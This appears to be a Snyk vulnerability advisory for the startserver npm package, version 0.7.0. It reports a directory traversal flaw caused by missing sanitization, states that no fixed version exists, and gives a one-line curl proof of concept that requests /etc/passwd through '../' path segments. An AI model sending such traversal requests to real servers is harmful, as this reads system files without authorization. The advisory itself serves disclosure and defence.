startserver@0.7.0 vulnerabilities

Yet another http server

Direct Vulnerabilities

Known vulnerabilities in the startserver package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • H
Directory Traversal

startserver is a Yet another http server

Affected versions of this package are vulnerable to Directory Traversal due to missing sanitization.

PoC

curl --path-as-is --url "http://localhost:8080/../../../../etc/passwd"

How to fix Directory Traversal?

There is no fixed version for startserver.

*